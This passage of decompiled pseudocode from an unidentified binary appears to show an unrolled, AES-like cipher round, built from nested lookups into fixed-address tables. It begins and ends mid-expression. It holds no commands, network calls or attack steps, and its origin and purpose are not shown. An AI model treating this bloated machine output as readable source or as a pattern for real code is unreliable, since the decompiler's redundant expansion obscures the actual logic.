*(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x18) * 4) ^  *(0x41beb0 + (_t110 & 0x000000ff) * 4) ^  *(_t181 - 4);
						_t182 = _t181 + 4;
						_t119 =  *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x18) * 4) ^  *(0x41beb0 + (_t110 & 0x000000ff) * 4) ^  *(_t181 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + 